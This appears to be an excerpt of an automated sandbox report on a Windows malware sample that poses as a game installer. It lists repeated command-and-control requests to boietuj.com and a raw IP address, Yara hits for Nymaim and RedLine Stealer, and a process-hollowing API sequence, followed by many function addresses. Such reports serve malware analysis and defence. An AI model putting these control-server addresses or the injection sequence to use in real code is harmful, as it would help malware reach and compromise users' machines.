            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficDNS traffic detected: DNS query: boietuj.com
            Source: altergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.202/s
            Source: altergame32.exe, 00000006.00000002.3047839093.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958
            Source: altergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
            Source: altergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.202/search/?q~w
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drString found in binary or memory: http://freecommander.com/chm/FreeCommanderXE_chm_de.zip
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drString found in binary or memory: http://freecommander.com/chm/FreeCommanderXE_chm_en.zip
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drString found in binary or memory: http://freecommander.com/en/downloads/
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drString found in binary or memory: http://www.forum.freecommander.com/viewtopic.php?f=6&t=775
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drString found in binary or memory: http://www.freecommander.com/fchelpxe/de/FreeCommander.html
            Source: altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drString found in binary or memory: http://www.freecommander.com/fchelpxe/en/FreeCommander.html
            Source: NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.drString found in binary or memory: http://www.innosetup.com/
            Source: NqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.drString found in binary or memory: http://www.remobjects.com/ps
            Source: NqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.drString found in binary or memory: http://www.remobjects.com/psU
            Source: altergame32.exe, 00000006.00000000.1928604067.00000000004CB000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.drString found in binary or memory: https://code.google.com/p/ddab-lib/issues/list
            Source: NqISs1vOr.exe, 00000002.00000003.1901672648.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1901741426.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000002.3047882008.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904023339.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047892256.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904097648.0000000002228000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3048327976.0000000002228000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
            Source: is-28G11.tmp.3.drBinary or memory string: DirectDrawCreateExmemstr_62e4b824-d

            E-Banking Fraud

            barindex
            Yara detected Nymaim
            Source: Yara matchFile source: 0.2.file.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00630110
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0042F518 NtdllDefWindowProc_A,3_2_0042F518
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00423B7C NtdllDefWindowProc_A,3_2_00423B7C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00478554 NtdllDefWindowProc_A,3_2_00478554
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004125D0 NtdllDefWindowProc_A,3_2_004125D0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,3_2_004573B4
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0042E92C: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,3_2_0042E92C
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_004555B8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410C080_2_00410C08
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004120D10_2_004120D1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004090FE0_2_004090FE
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004101800_2_00410180
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004106C40_2_004106C4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004113000_2_00411300
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409FA00_2_00409FA0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064604E0_2_0064604E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063F82C0_2_0063F82C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006359100_2_00635910
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006412600_2_00641260
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006359100_2_00635910
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063F4EA0_2_0063F4EA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006346E00_2_006346E0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063BFF00_2_0063BFF0
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_0040840C2_2_0040840C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004800023_2_00480002
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004704C83_2_004704C8
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004671CC3_2_004671CC
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004352C03_2_004352C0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004861403_2_00486140
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004303543_2_00430354
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004444C03_2_004444C0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004345BC3_2_004345BC
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00444A683_2_00444A68
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00430EE03_2_00430EE0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0045EEEC3_2_0045EEEC
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0045AF943_2_0045AF94
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004870A03_2_004870A0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004451603_2_00445160
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0046922C3_2_0046922C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0048D4003_2_0048D400
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0044556C3_2_0044556C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004519903_2_00451990
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0043DD483_2_0043DD48
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_004010516_2_00401051
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_00401C266_2_00401C26
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_004070A76_2_004070A7
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609660FA6_2_609660FA
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6092114F6_2_6092114F
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6091F2C96_2_6091F2C9
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096923E6_2_6096923E
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6093323D6_2_6093323D
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095C3146_2_6095C314
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609503126_2_60950312
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094D33B6_2_6094D33B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6093B3686_2_6093B368
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096748C6_2_6096748C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6093F42E6_2_6093F42E
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609544706_2_60954470
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609615FA6_2_609615FA
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A5EE6_2_6096A5EE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096D6A46_2_6096D6A4
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609606A86_2_609606A8
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609326546_2_60932654
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609556656_2_60955665
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B7DB6_2_6094B7DB
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6092F74D6_2_6092F74D
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609648076_2_60964807
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094E9BC6_2_6094E9BC
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609379296_2_60937929
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6093FAD66_2_6093FAD6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096DAE86_2_6096DAE8
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094DA3A6_2_6094DA3A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60936B276_2_60936B27
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60954CF66_2_60954CF6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60950C6B6_2_60950C6B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60966DF16_2_60966DF1
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60963D356_2_60963D35
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60909E9C6_2_60909E9C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60951E866_2_60951E86
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60912E0B6_2_60912E0B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60954FF86_2_60954FF8
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5E24D6_2_02E5E24D
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E4F0796_2_02E4F079
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E64EE96_2_02E64EE9
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5E6656_2_02E5E665
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E62E746_2_02E62E74
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E59F446_2_02E59F44
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5ACFA6_2_02E5ACFA
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5DD596_2_02E5DD59
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E585036_2_02E58503
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E7BF806_2_02E7BF80
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E7BF316_2_02E7BF31
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E7B4E56_2_02E7B4E5
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\EShineEncoder\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 0040595C appears 116 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00403400 appears 61 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00406AB4 appears 41 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00445DCC appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 004344D4 appears 32 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 0044609C appears 59 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00408BFC appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00457D3C appears 73 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00403494 appears 82 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 004078E4 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: String function: 00453318 appears 93 times
